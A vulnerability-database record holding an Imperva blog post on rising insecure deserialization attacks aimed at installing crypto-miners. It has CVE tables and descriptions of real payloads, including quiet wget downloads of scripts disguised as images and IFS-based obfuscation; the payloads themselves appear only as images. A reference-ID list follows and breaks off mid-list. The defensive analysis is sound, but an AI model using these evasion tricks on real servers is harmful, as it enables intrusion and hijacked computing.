DATABASE RESOURCES PRICING ABOUT US

{"cvelist": ["CVE-2012-4858", "CVE-2015-3253", "CVE-2015-4852", "CVE-2015-5254", "CVE-2015-5348", "CVE-2015-6420", "CVE-2015-6555", "CVE-2015-6576", "CVE-2015-6934", "CVE-2015-7253", "CVE-2015-7450", "CVE-2015-7501", "CVE-2015-8103", "CVE-2015-8237", "CVE-2015-8238", "CVE-2015-8360", "CVE-2015-8545", "CVE-2015-8581", "CVE-2015-8765", "CVE-2016-0714", "CVE-2016-0779", "CVE-2016-0788", "CVE-2016-0958", "CVE-2016-1291", "CVE-2016-1487", "CVE-2016-1985", "CVE-2016-1986", "CVE-2016-1997", "CVE-2016-1998", "CVE-2016-1999", "CVE-2016-2000", "CVE-2016-2003", "CVE-2016-2170", "CVE-2016-2173", "CVE-2016-2510", "CVE-2016-3415", "CVE-2016-3427", "CVE-2016-3461", "CVE-2016-3642", "CVE-2016-4372", "CVE-2016-4385", "CVE-2016-5004", "CVE-2016-5229", "CVE-2016-6809", "CVE-2016-7462", "CVE-2016-8735", "CVE-2016-8744", "CVE-2016-8749", "CVE-2016-9299", "CVE-2016-9606", "CVE-2017-1000353", "CVE-2017-10271", "CVE-2017-11283", "CVE-2017-11284", "CVE-2017-12149", "CVE-2017-2608", "CVE-2017-3066", "CVE-2017-3159", "CVE-2017-5586", "CVE-2017-5638", "CVE-2017-5641", "CVE-2017-5645", "CVE-2017-5878", "CVE-2017-7504", "CVE-2017-9805", "CVE-2017-9830", "CVE-2017-9844"], "id": "IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7", "type": "impervablog", "description": "Imperva\u2019s research group is constantly monitoring new web application vulnerabilities. In doing so, we\u2019ve noticed at least four major insecure deserialization vulnerabilities that were published in the past year.\n\nOur analysis shows that, in the past three months, the number of deserialization attacks has grown by 300 percent on average, turning them into a serious security risk to web applications.\n\nTo make things worse, many of these attacks are now launched with the intent of installing crypto-mining malware on vulnerable web servers, which gridlocks their CPU usage.\n\nIn this blog post we will explain what insecure deserialization vulnerabilities are, show the growing trend of attacks exploiting these vulnerabilities and explain what attackers do to exploit them (including real-life attack examples).\n\n## What Is Serialization?\n\nThe process of serialization converts a \u201clive\u201d object (structure and/or state), like a Java object, into a format that can be sent over the network, or stored in memory or on disk. Deserialization converts the format back into a \u201clive\u201d object.\n\nThe purpose of serialization is to preserve an object, meaning that the object will exist outside the lifetime of the local machine on which it is created.\n\nFor example, when withdrawing money from an ATM, the information of the account holder and the required operation is stored in a local object. Before this object is sent to the main server, it is serialized in order to perform and approve the needed operations. The server then deserializes the object to complete the operation.\n\n## Types of Serialization\n\nThere are many types of [serialization](<https://en.wikipedia.org/wiki/Serialization#Serialization_formats>) available, depending on the object which is being serialized and on the purpose. Almost all modern programming languages support serialization. In Java for example an object is converted into a compact representation using byte stream, and the byte stream can then be reverted back into a copy of that object.\n\nOther types of serialization include converting an object into a hierarchical format like JSON or XML. The advantage of this serialization is that the serialized objects can be read as plain text, instead of a byte stream.\n\n## Deserialization Vulnerabilities from the Past Three Months\n\nIn the [OWASP top 10 security risks of 2017](<https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf>) insecure deserialization came in at [eighth place](<https://www.owasp.org/index.php/Top_10-2017_A8-Insecure_Deserialization>) and rightfully so as we argued in our [previous blog](<https://www.imperva.com/blog/2017/12/the-state-of-web-application-vulnerabilities-in-2017/>) about the state of web application vulnerabilities in 2017.\n\nIn 2017, major new vulnerabilities related to insecure serialization, mostly in Java, were published (see Figure 1).\n\n**Name** | **Release Date (Day/Month/Year)** | **Vulnerability details** \n---|---|--- \nCVE-2017-12149 | 01/08/2017 | Vulnerability in the JBoss Application Server allows execution of arbitrary code via crafted serialized data because the HTTP Invoker does not restrict classes for which it performs deserialization \nCVE-2017-10271 | 21/06/2017 | Vulnerability in the Oracle WebLogic Server allows execution of arbitrary code due to insufficient sanitizing of user supplied inputs in the wls-wsat component \nCVE-2017-9805\n\n | 21/06/2017 | The REST Plugin in Apache Struts uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to remote code execution when deserializing XML payloads. \nCVE-2017-7504 | 05/04/2017 | The HTTPServerILServlet.java in JMS allows remote attackers to execute arbitrary code via crafted serialized data because it does not restrict the classes for which it performs deserialization \n \n_Figure 1: CVEs related to insecure deserialization_\n\nIn order to understand the magnitude of these vulnerabilities, we analyzed attacks from the past three months (October to December of 2017) that try to exploit insecure deserialization. A key observation is the _steep_ increase of deserialization attacks in the past few months, as can be seen in the Figure 2.\n\n \n_Figure 2: Insecure deserialization attacks over the course of three months_\n\nMost of the attackers used no attack vectors other than insecure deserialization. We noticed that each attacker was trying to exploit different vulnerabilities, with the above-mentioned CVEs being the most prevalent.\n\nFor a full list of CVEs related to insecure deserialization from the past few years see Figure 3.\n\n**Name** | **Relevant System** | **Public Exploit** | **Name** | **Relevant System** | **Public Exploit** \n---|---|---|---|---|--- \nCVE-2017-9844 | SAP NetWeaver | Yes | CVE-2016-2170 | Apache OFBiz | No \nCVE-2017-9830 | Code42 CrashPlan | No | CVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No \nCVE-2017-9805 | Apache Struts | Yes | CVE-2016-2000 | HP Asset Manager | No \nCVE-2017-7504 | Red Hat JBoss | Yes | CVE-2016-1999 | HP Release Control | No \nCVE-2017-5878 | Apache OpenMeetings | Yes | CVE-2016-1998 | HP Service Manager | No \nCVE-2017-5645 | Apache Log4j | No | CVE-2016-1997 | HP Operations Orchestration | No \nCVE-2017-5641 | Apache BlazeDS | Yes | CVE-2016-1986 | HP Continuous Delivery Automation | No \nCVE-2017-5586 | OpenText Documentum D2 | Yes | CVE-2016-1985 | HP Operations Manager | No \nCVE-2017-3159 | Apache Camel | Yes | CVE-2016-1487 | Lexmark Markvision Enterprise | No \nCVE-2017-3066 | Adobe ColdFusion | Yes | CVE-2016-1291 | Cisco Prime Infrastructure | Yes \nCVE-2017-2608 | Jenkins | Yes | CVE-2016-0958 | Adobe Experience Manager | No \nCVE-2017-12149 | Red Hat JBoss | Yes | CVE-2016-0788 | Jenkins | Yes \nCVE-2017-11284 | Adobe ColdFusion | No | CVE-2016-0779 | Apache TomEE | No \nCVE-2017-11283 | Adobe ColdFusion | No | CVE-2016-0714 | Apache Tomcat | No \nCVE-2017-1000353 | CloudBees Jenkins | Yes | CVE-2015-8765 | McAfee ePolicy Orchestrator | No \nCVE-2016-9606 | Resteasy | Yes | CVE-2015-8581 | Apache TomEE | No \nCVE-2016-9299 | Jenkins | Yes | CVE-2015-8545 | NetApp | No \nCVE-2016-8749 | Jackson (JSON) | Yes | CVE-2015-8360 | Atlassian Bamboo | No \nCVE-2016-8744 | Apache Brooklyn | Yes | CVE-2015-8238 | Unify OpenScape | No \nCVE-2016-8735 | Apache Tomcat JMX | Yes | CVE-2015-8237 | Unify OpenScape | No \nCVE-2016-7462 | VMWare vRealize Operations | No | CVE-2015-8103 | Jenkins | Yes \nCVE-2016-6809 | Apache Tika | No | CVE-2015-7501 | Red Hat JBoss | Yes \nCVE-2016-5229 | Atlassian Bamboo | Yes | CVE-2015-7501 | Oracle Application Testing Suite | No \nCVE-2016-5004 | Apache Archiva | Yes | CVE-2015-7450 | IBM Websphere | Yes \nCVE-2016-4385 | HP Network Automation | No | CVE-2015-7253 | Commvault Edge Server | Yes \nCVE-2016-4372 | HP iMC | No | CVE-2015-6934 | VMWare vCenter/vRealize | No \nCVE-2016-3642 | Solarwinds Virtualization Manager | Yes | CVE-2015-6576 | Atlassian Bamboo | No \nCVE-2016-3461 | Oracle MySQL Enterprise Monitor | Yes | CVE-2015-6555 | Symantec Endpoint Protection Manager | Yes \nCVE-2016-3427 | JMX | Yes | CVE-2015-6420 | Cisco (various frameworks) | No \nCVE-2016-3415 | Zimbra Collaboration | No | CVE-2015-5348 | Apache Camel | No \nCVE-2016-2510 | Red Hat JBoss BPM Suite | No | CVE-2015-5254 | Apache ActiveMQ | No \nCVE-2016-2173 | Spring AMPQ | No | CVE-2015-4852 | Oracle WebLogic | Yes \nCVE-2016-2170 | Apache OFBiz | No | CVE-2015-3253 | Jenkins | Yes \nCVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No | CVE-2012-4858 | IBM Congnos BI | No \n \n_Figure 3: CVEs related to insecure deserialization_\n\n## Deserialization Attacks in the Wild\n\nMost of the attacks that we saw are related to byte-stream serialization of Java objects. Also, we saw some attacks related to serialization to XML and other formats, see Figure 4.\n\n \n_Figure 4: Distribution of vulnerabilities over different serialization formats_\n\nIn the following attack (see Figure 5) the attacker is trying to exploit CVE-2017-10271. The payload is sent in the HTTP request\u2019s body using a serialized Java object through XML representation.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-serialized-java-array-into-XML-fig-5.png>)\n\n_Figure 5: Attack vector containing a serialized java array into an XML_\n\nThe fact that this is a Java array can be seen by the hierarchical structure of the parameters, with the suffix of **\u201cjava/void/array/void/string\u201d**. The attacker is trying to run a bash script on the attacked server.\n\nThis bash script tries to send an HTTP request using \u201cwget\u201d OS command, download a shell script disguised as a picture file (note the jpg file extension) and run it. Few interesting notes can be made examining this command:\n\n * The existence of shell and \u201cwget\u201d commands indicate that this payload is targeting Linux systems\n * Using a picture file extension is usually done to evade security controls\n * The **\u201c-q\u201d** parameter to \u201cwget\u201d stands for \u201cquiet\u201d, this means that \u201cwget\u201d will have no output to the console, hence it will be harder to note that such a request was even made. Once the downloaded script runs the server is infected with a crypto mining malware trying to mine Monero digital coins (a crypto currency similar to Bitcoin).\n\nThe next script (see Figure 6) tries to exploit the same vulnerability, but this time the payload is targeting Windows servers using cmd.exe and Powershell commands to download the malware and run it.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-infect-Windows-server-with-crypto-mining-malware-fig-6.png>)\n\n_Figure 6: Attack vector trying to infect Windows server with crypto mining malware_\n\nThis indicates that there are two different infection methods for Windows and Linux server, each system with its designated script.\n\nAnother example is the following payload (Figure 7) that we pulled from an attack trying to exploit a [deserialization vulnerability](<http://seclists.org/oss-sec/2016/q1/461>) with a Java serialized object.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-java-serialized-object.jpg>)\n\n_Figure 7: Attack vector containing a Java serialized object trying to download a crypto miner_\n\nThe \u201cbad\u201d encoding is an artifact of Java serialization, where the object is represented in the byte stream.\n\nStill, we can see a script in plain text marked in yellow. Shown as an image below is a variable that defines an internal field separator, where in this case it is just a variable for space. The variable is probably used instead of a space to try to make the payload harder to detect.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/insert-into-paragraph.jpg>)\n\nJust as in the previous examples, this Bash script targets Linux servers that send an HTTP request using \u201cwget\u201d to download a crypto miner.\n\n## Beyond Insecure Deserialization\n\nThe common denominator of the attacks above is that attackers are trying to infect the server with a crypto mining malware by using an insecure deserialization vulnerability. However insecure deserialization is not the only method to achieve this goal.\n\nBelow (Figure 8) we see an example of another attack payload, this time at the \u201cContent-Type\u201d header.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-using-RCE-vulnerability-of-Apache-Struts-fig-8.jpg>)\n\n_Figure 8: Attack vector using an RCE vulnerability of Apache Struts_\n\nThis attack tries to exploit **CVE-2017-5638**, a well-known RCE vulnerability related to Apache Struts which was published in March 2017 and was covered in a [previous blog post](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>).\n\nWhen it was originally published we saw no indications of crypto miners in the attacks\u2019 payloads related to this CVE, and most of the payloads were reconnaissance attacks.\n\nHowever, in this attack the payload (marked in yellow above) is very similar to the payload from the previous example. Using the same remote server and the exact same script, it infected the server with crypto mining malware.\n\nThis old attack method with a new payload suggests a new trend in the cyber arena \u2013 attackers try to exploit RCE vulnerabilities, new and old, to turn vulnerable servers into crypto miners and get a faster ROI for their \u201ceffort\u201d.\n\n## Recommendations\n\nGiven the many new vulnerabilities related to insecure deserialization that were discovered this year, and its appearance in the OWASP top 10 security risks, we expect to see newer related vulnerabilities released in 2018. In the meantime, organizations using affected servers are advised to use the latest patch to mitigate these vulnerabilities.\n\nAn alternative to manual patching is virtual patching. Virtual patching actively protects web applications from attacks, reducing the window of exposure and decreasing the cost of emergency patches and fix cycles.\n\nA WAF that provides virtual patching doesn\u2019t interfere with the normal application workflow, and keeps the site protected while allowing the site owners to control the patching process timeline.\n\nLearn more about how to protect your web applications from vulnerabilities with [Imperva WAF solutions](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>).", "lastseen": "2018-01-25T09:59:26", "enchantments_done": [], "reporter": "Nadav Avital", "href": "https://www.imperva.com/blog/2018/01/deserialization-attacks-surge-motivated-by-illegal-crypto-mining/", "modified": "2018-01-24T17:45:08", "title": "Deserialization Attacks Surge Motivated by Illegal Crypto-mining", "viewCount": 1920, "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "bulletinFamily": "blog", "references": [], "enchantments": {"dependencies": {"references": [{"type": "adobe", "idList": ["APSB17-14", "APSB17-30"]}, {"type": "aix", "idList": ["JAVA_APRIL2016_ADVISORY.ASC"]}, {"type": "amazon", "idList": ["ALAS-2015-618", "ALAS-2016-679", "ALAS-2016-680", "ALAS-2016-681", "ALAS-2016-688", "ALAS-2016-693", "ALAS-2016-700", "ALAS-2016-776", "ALAS-2016-777", "ALAS-2016-778", "ALAS-2022-1562"]}, {"type": "archlinux", "idList": ["ASA-201511-11", "ASA-201611-22"]}, {"type": "atlassian", "idList": ["ATLASSIAN:BAM-16439", "ATLASSIAN:BAM-17099", "ATLASSIAN:BAM-17101", "ATLASSIAN:BAM-17736", "ATLASSIAN:BAM-18242", "ATLASSIAN:CWD-4879", "ATLASSIAN:JRA-59887", "ATLASSIAN:JRASERVER-59887", "ATLASSIAN:JRASERVER-65102", "BAM-16439", "BAM-17099", "BAM-17101", "BAM-17736", "BAM-18242", "CWD-4879", "JRASERVER-59887", "JRASERVER-65102"]}, {"type": "attackerkb", "idList": ["AKB:195A97E5-45A3-4A70-95E4-60FF9B5AD20D", "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:35827632-EC31-4E5E-9B47-E5634C603428", "AKB:38474044-13DA-4165-A8D4-86867CA68D83", "AKB:4D7DB359-066E-4E56-AFBB-FA98BF564F13", "AKB:5A79A3DC-D4D7-4FF8-BE45-A4E658714412", "AKB:71A48C9F-C37B-4C1A-AD30-456EF1B66CF9", "AKB:7992242A-E0F4-4572-BE13-859467611F09", "AKB:9A355845-4C8F-48C3-9829-4A54539E1FB8", "AKB:BC293A26-1A78-4F0D-B4CE-04E218BA7440", "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080", "AKB:FB2F65B2-D10B-4622-AEE6-41AAD3C1E6E7", "AKB:FF34D034-592E-4D75-BE7B-74387AB0EF37"]}, {"type": "avleonov", "idList": ["AVLEONOV:77E5BDCD31BFF42A59B6BE11B5F5598C"]}, {"type": "canvas", "idList": ["JBOSS6_JMXINVOKERSERVLET_DESERIALIZE", "JBOSSMQ_HTTPIL_DESERIALIZATION", "JENKINS_CLI_DESERIALIZATION", "JENKINS_JRMP_DESERIALIZATION", "STRUTS_OGNL", "VREALIZE_VCOFACTORY_DESERIALIZE", "WEBLOGIC_T3_DESERIALIZATION"]}, {"type": "centos", "idList": ["CESA-2015:2521", "CESA-2015:2522", "CESA-2015:2671", "CESA-2016:0650", "CESA-2016:0651", "CESA-2016:0675", "CESA-2016:0676", "CESA-2016:0723", "CESA-2016:2045", "CESA-2016:2599", "CESA-2017:2423", "CESA-2017:2486"]}, {"type": "cert", "idList": ["VU:112992", "VU:307983", "VU:576313", "VU:581311", "VU:834067", "VU:866432"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2015-1313", "CPAI-2015-1321", "CPAI-2015-1337", "CPAI-2015-1419", "CPAI-2016-0695", "CPAI-2016-0718", "CPAI-2016-0968", "CPAI-2017-0197", "CPAI-2017-0676", "CPAI-2017-0742", "CPAI-2017-0884", "CPAI-2017-1019", "CPAI-2017-1066", "CPAI-2017-1088", "CPAI-2017-1216", "CPAI-2018-0013", "CPAI-2018-0130", "CPAI-2018-0799", "CPAI-2019-0387", "CPAI-2019-1132", "CPAI-2021-0765"]}, {"type": "cisa", "idList": ["CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:5FE14EDE9F5E20EB9536DC356A82AAB6", "CISA:99DAB57F9B8063F8619B1A418B014DF1", "CISA:C0680147E070CCC4182A654B22694B78", "CISA:F3C70D08CAE58CBD29A5E5ED6B2AE473"]}, {"type": "cisco", "idList": ["CISCO-SA-20151209-JAVA-DESERIALIZATION", "CISCO-SA-20160406-REMCODE", "CISCO-SA-20170310-STRUTS2", "CISCO-SA-20170907-STRUTS2"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:1DFE9585B9C1AAABE38F2402F4352EFD", "CFOUNDRY:3B3A927B1B8E5A80A8EA38A6AACF98EE", "CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350"]}, {"type": "cve", "idList": ["CVE-2012-4858", "CVE-2015-3253", "CVE-2015-4852", "CVE-2015-5254", "CVE-2015-5348", "CVE-2015-5377", "CVE-2015-6420", "CVE-2015-6555", "CVE-2015-6576", "CVE-2015-6934", "CVE-2015-7253", "CVE-2015-7450", "CVE-2015-7501", "CVE-2015-8103", "CVE-2015-8360", "CVE-2015-8581", "CVE-2015-8765", "CVE-2016-0714", "CVE-2016-0779", "CVE-2016-0788", "CVE-2016-0958", "CVE-2016-1291", "CVE-2016-1487", "CVE-2016-1985", "CVE-2016-1986", "CVE-2016-1997", "CVE-2016-1998", "CVE-2016-1999", "CVE-2016-2000", "CVE-2016-2003", "CVE-2016-2170", "CVE-2016-2173", "CVE-2016-2510", "CVE-2016-3415", "CVE-2016-3427", "CVE-2016-3461", "CVE-2016-3642", "CVE-2016-4372", "CVE-2016-4385", "CVE-2016-5004", "CVE-2016-5229", "CVE-2016-6809", "CVE-2016-7462", "CVE-2016-8735", "CVE-2016-8744", "CVE-2016-8749", "CVE-2016-9299", "CVE-2016-9571", "CVE-2016-9606", "CVE-2017-1000353", "CVE-2017-10271", "CVE-2017-11283", "CVE-2017-11284", "CVE-2017-12149", "CVE-2017-2608", "CVE-2017-3066", "CVE-2017-3159", "CVE-2017-5586", "CVE-2017-5638", "CVE-2017-5641", "CVE-2017-5645", "CVE-2017-5878", "CVE-2017-7504", "CVE-2017-9805", "CVE-2017-9830", "CVE-2017-9844", "CVE-2018-1051", "CVE-2018-1310"]}, {"type": "debian", "idList": ["DEBIAN:DLA-274-1:EF71E", "DEBIAN:DLA-435-1:50A71", "DEBIAN:DLA-443-1:91EA1", "DEBIAN:DLA-451-1:707F7", "DEBIAN:DLA-728-1:A9D65", "DEBIAN:DLA-728-1:ECD0E", "DEBIAN:DLA-729-1:1B0B9", "DEBIAN:DLA-729-1:E931B", "DEBIAN:DSA-3504-1:764CA", "DEBIAN:DSA-3504-1:AD20F", "DEBIAN:DSA-3524-1:E8A15", "DEBIAN:DSA-3530-1:6A530", "DEBIAN:DSA-3552-1:E23CF", "DEBIAN:DSA-3558-1:5D79E", "DEBIAN:DSA-3609-1:174EB", "DEBIAN:DSA-3738-1:66970", "DEBIAN:DSA-3738-1:EB221", "DEBIAN:DSA-3739-1:06429", "DEBIAN:DSA-3739-1:1BDAB"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2015-3253", "DEBIANCVE:CVE-2015-5254", "DEBIANCVE:CVE-2015-7501", "DEBIANCVE:CVE-2016-0714", "DEBIANCVE:CVE-2016-2510", "DEBIANCVE:CVE-2016-3427", "DEBIANCVE:CVE-2016-6809", "DEBIANCVE:CVE-2016-8735", "DEBIANCVE:CVE-2016-9606", "DEBIANCVE:CVE-2017-5645", "DEBIANCVE:CVE-2018-1051"]}, {"type": "dsquare", "idList": ["E-643"]}, {"type": "erpscan", "idList": ["ERPSCAN-17-014"]}, {"type": "exploitdb", "idList": ["EDB-ID:38983", "EDB-ID:41366", "EDB-ID:42627", "EDB-ID:42806", "EDB-ID:43392", "EDB-ID:43458", "EDB-ID:43924", "EDB-ID:43993"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:028DB84C4840B8D96405811A4FA47345", "EXPLOITPACK:688851AE0376E48F469617E2884BAE9D", "EXPLOITPACK:AEF394BE7B6F77BDE66C79DE40366485", "EXPLOITPACK:C22F157FABAD412B7D508C7EEC750856", "EXPLOITPACK:DEBBBD9CB5D7CBBF28AAD15BB9949E3A", "EXPLOITPACK:E47A4ABCB334901131160C872A570166"]}, {"type": "f5", "idList": ["F5:K04734219", "F5:K23173103", "F5:K30518307", "F5:K43451236", "F5:K49233165", "F5:K49820145", "F5:K58084500", "F5:K73112451", "F5:K84144321", "SOL30518307", "SOL30971148", "SOL49233165", "SOL49820145", "SOL73112451"]}, {"type": "fedora", "idList": ["FEDORA:00FE3602E41B", "FEDORA:0AC1C60C76B5", "FEDORA:125286087B00", "FEDORA:1DA54604D2A3", "FEDORA:28ED3610D7CE", "FEDORA:2F34C6133E02", "FEDORA:341EA6057129", "FEDORA:376506075014", "FEDORA:4045A6092226", "FEDORA:4976E60A5629", "FEDORA:64CEB6090E5D", "FEDORA:706BF6090E66", "FEDORA:76CFD605E21F", "FEDORA:7EEB260C852D", "FEDORA:8CEB2616D980", "FEDORA:9242E60D30E0", "FEDORA:978FF6087D29", "FEDORA:A4C8960949E6", "FEDORA:A99066078F69", "FEDORA:ACB376074FEE", "FEDORA:C1825622B8C0", "FEDORA:CCC6D6078F5C", "FEDORA:CE4F260CE12E", "FEDORA:D5E3660AB7E2", "FEDORA:E7173602E415", "FEDORA:EFDAB6050C3B", "FEDORA:F25536078C20"]}, {"type": "fireeye", "idList": ["FIREEYE:2473273CA0F291BCEBB5F99AA3E4F256", "FIREEYE:399092589F455855881447C60B56C21A", "FIREEYE:42E1F284AEBD41C72EC6CD12CDCCD0A6", "FIREEYE:57B0F10A16E18DC672833B1812005B76", "FIREEYE:6B4CFD4290F6444DFC070D828CEC509A", "FIREEYE:C097B41677EDE5F95DB4B84AD6726751"]}, {"type": "fortinet", "idList": ["FG-IR-17-205"]}, {"type": "freebsd", "idList": ["0B9AF110-D529-11E6-AE1B-002590263BF5", "1F1124FE-DE5C-11E5-8FA8-14DAE9D210B8", "27EEE66D-9474-44A5-B830-21EC12A1C307", "4AF92A40-DB33-11E6-AE1B-002590263BF5", "5CFA9D0C-73D7-4642-AF4F-28FBED9E9404", "631C4710-9BE5-4A80-9310-EB2847FE24DD", "67B3FEF2-2BEA-11E5-86FF-14DAE9D210B8", "7E01DF39-DB7E-11E5-B937-00E0814CAB4E", "8C2B2F11-0EBE-11E6-B55E-B499BAEBFEAF", "9E5BBFFC-D8AC-11E5-B2BD-002590263BF5", "A258604D-F2AA-11E5-B4A9-AC220BDCEC59"]}, {"type": "gentoo", "idList": ["GLSA-201606-18", "GLSA-201607-17", "GLSA-201610-01", "GLSA-201705-09"]}, {"type": "github", "idList": ["GHSA-26V6-W6FW-RH94", "GHSA-26WC-3WQP-G3RP", "GHSA-2X9H-H3C4-WQQH", "GHSA-6HGM-866R-3CJV", "GHSA-FWQR-3PVP-PJWQ", "GHSA-FXPH-Q3J8-MV87", "GHSA-GG9M-FJ3V-R58C", "GHSA-GXG6-RC6C-V673", "GHSA-HRP3-8P5W-27GV", "GHSA-HVPR-9CR6-Q5V7", "GHSA-J77Q-2QQG-6989", "GHSA-J8G6-2WH7-6439", "GHSA-MV42-PX54-87JW", "GHSA-Q9HR-3PG4-3JP4", "GHSA-QG25-HGJV-CG9Q", "GHSA-VVJC-Q5VR-52Q6"]}, {"type": "githubexploit", "idList": ["328E8BFC-210D-5993-885E-7710FEE734CC", "7BA07704-21CC-5BFC-A0F9-8FDA2BC84402", "C2D99D6A-1A8C-5D55-BBB7-34A978AAC642"]}, {"type": "hackerone", "idList": ["H1:208566", "H1:221294", "H1:576887"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170316-01-STRUTS2"]}, {"type": "ibm", "idList": ["031AAD2F4A8A9C4530B608777F7DDA3A6A4ABAEC1F0C0C1398E073B1E0501315", "06457DA2FE08EC56407EF05C2EAAA9080634D44807C2A8ABBDEA18DCD9364BAC", "07DBE9517A4611E5419E1606D2F71A8201613E4042A34EE495FE116635651800", "0A188938BB57625255598B9B581375E3C99A86BB3F15E48ED8315B0895EAF89D", "0C0CCA72486D24634C199E09AA3461D9A894E25EB43C3E1735E0C1DEC7D01678", "0C4F91C9AA7E146EDA1AA877B92C4C590E445AC7D2AC0E60ECCE4BA77A47F0EB", "0C789A293EDA416139FC93A0F98B711533975F4FF301F513B32B4DA1FA748C6A", "0CE9B36358C9687E7112577EA1304074A68EA6DD5359A3F6615F7BA94A6B8E7D", "0D0755F0269505405CB64BD65BD409DF7890B56244501D37813BE723F406D6C1", "105120949BC0CCA8DE1379F674E81CE40B9C51F2D99DA4E967FBCAA179E0FFEA", "13C3D53BA54035028BA8B6CCC92D57C0C0AFB5754F2A746073C2E64512AF302A", "14D6BD9FB21D986F7A7372B530E1023CD0FF42323E4743E166603718FA4482AC", "1589B4745F310D5E19839D029CFF7AA2E7CE499911AB5E7A7A0995F367A8F990", "16851167A6E7D383CF52D5B447DED7E09886CA93B8A9A92A25FD7998659A49D8", "1696E1D8792540E46785AF5C86F8AD0F77D5F716A56F15223E99344280FB380A", "182B7E2B619361F12F4ED5FC874487EFED77E355247E741885559BD37BCBA877", "1BFF63EB8AF39056E08427B06D34E43B32E43FBCC74FB2A85F32E708984FD60F", "265C7F39696063EC6C052A835129BE2250A30FFCD1A9F5A46A6025E12F1AEC5A", "2AD55644A16B08DC4CD7D5B0074C944128455FA5FB38A6CCCF95596E90E15198", "2E9BC1AFBA9F34E20E313BA5B8B5B6C1AEEC0E8F6EC0B353125AA17460789A62", "2F5E9F58C5211E4D42487F7A140F36650CEBDEBD701BADBE4FFD04B577E43B91", "300B30B77E64A29C8B399F8C62E9F501F6C76F9367F47CB2AECB5124ADBB7048", "305CFF54D1B74278AA889780BABE7E0790314E9D321B6262C0EA59170C7721E6", "30B97F976830F38EC78A601AC4AF08E5E915E3601910C6A37C3824A2F36E31B8", "342276C20A5C5FDDDF8726F4B0773A53244224965A0AE1BE83CE2A30F753D938", "3484930B9D1D577B443F9B6823E8F4CFC7578B80B89E16866C07AC9046A0F330", "38EA893B1CB49114E3D8196A772DD2EACB1D68746AC3215F7DC912F30D4B3635", "391849D137C8AE4FB53B4FC5E1B3F8D0BCDD416F030E276A01FE226C2BE1B6BA", "3C13E1626546AB19B54BC13C855DB4A4A72EDBD9013028CD74215F23DDA82984", "3D8B3E5AED8F71EEDEBD1FA1200BCA1ACD2E6E31D2F51811AA482BFACE6985B6", "3EF919878669EE41DD08409B9AA0E2DAA0F0DBC40CFE18712D5924A93F1806CF", "3FDC0101985ADD7D5774F255D78C573813EE11684088944BAF72283AB319514E", "411DE209066A00259E38D292C22264C2EDA3B961B523920D589433F42FB534BC", "418A4C8D1E8F2E8A923DFE2C36570B4A5EF7B515E050C0F19513AF3DAE7D2628", "41A2B080355DFAE7EADFECB4D5D6C7105784D83B969140D731128E3E9EDA0757", "435516AF6D5C3AA4A41E050752C520D87248D73515C5F8742AB46F7FEAE2E9A4", "4429AE393D14D9DD1BA1A49D42CB67BB5D731909307AF189B937C047DFFB1943", "44D4BE9C6B3A5CA2D7E393A0C6B1DE6752C9B6BDF8F6BC23CA690D4063D3152B", "45B8083C191232F81D36077A9DB997569CBCDF51915A12038301F1630F4EE215", "46FE088816BBFEE72216A2D1696268656632FBC221AF416D29C97A319ABF449D", "471FC6DCFC7216154A057D59B759EF42BEB095C5F6F09974870FD1E5968AC39A", "4B658A4E1DD9BEBA4FC01E63048598E09F50CB1F3DF1425149B30054D8A86861", "4E95B5EB959CBE5490B90287812FD445A690A3158E83D37882EADCE4A7BCD44F", "51AB1F7F50AE2546674F97D246115890E30F6672B86D6D523810D29C5BAE0D62", "5281637484F76A0F64AF63C7B85C8EF529B52AD9676E8EABE3AB850E14B04D98", "52BCF84201CEBA012FEF5D806CBEB019BE40DA44E167DE103878B677EE8CAFAB", "5AC842C76A38BA7E6961E8ACD0BA85FA50688DCA05B04D73F870154778C0B550", "5E2AFDF7AB3E087F15E11D8D08AEEF34592E638BA469F3697192CBD365B9C998", "5E90705663750F9AAC65B53F188110D6CF86356EBD6A0890270ADE925BFCD638", "5F7C53205F3C1DF73818472F4A9E6151FAF5B6BEA01F0D749018E0315B401DAE", "63348F566FADDD53F743F6728812719200000602FE07DC239E5916DE25B8BFFE", "6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "65DB2DF1E5DFCD77CCBBB618503600B226ECB723619232D76182A80D58890F9D", "689070AB4C011A979BBA5848242A400944D849D04225B611EB1D2B6DEFE03427", "6C099EB2D7A6A7FB08F677C5022E99A80942C8B6F6F4DD59D6C967A34499E8CB", "6D6FD3B17FF4E3AEC7C3300A59DF811D1AEFB71253A1B03A9B6D6569C666112F", "6D942CB417D4204D06F0CBF19552CC6688E172640D20E82701FCFAE84C9D5423", "6E10F95EC3209DC93A3215EDD3E09828D356327BBCFCB364CB9408C9804A6F8E", "6F9B3E5D97FDBB41059AA8C4DDC3F8C6E337642756FF537C16A61C7599D523B9", "7046138B9599A1C4F494C484A9BB676F47CE5DB50FD7EC9400CB6F191317A8B0", "705280D237DEDB26D3D68396BC2097819ADC8127D93D08AF8CFC027E9A703179", 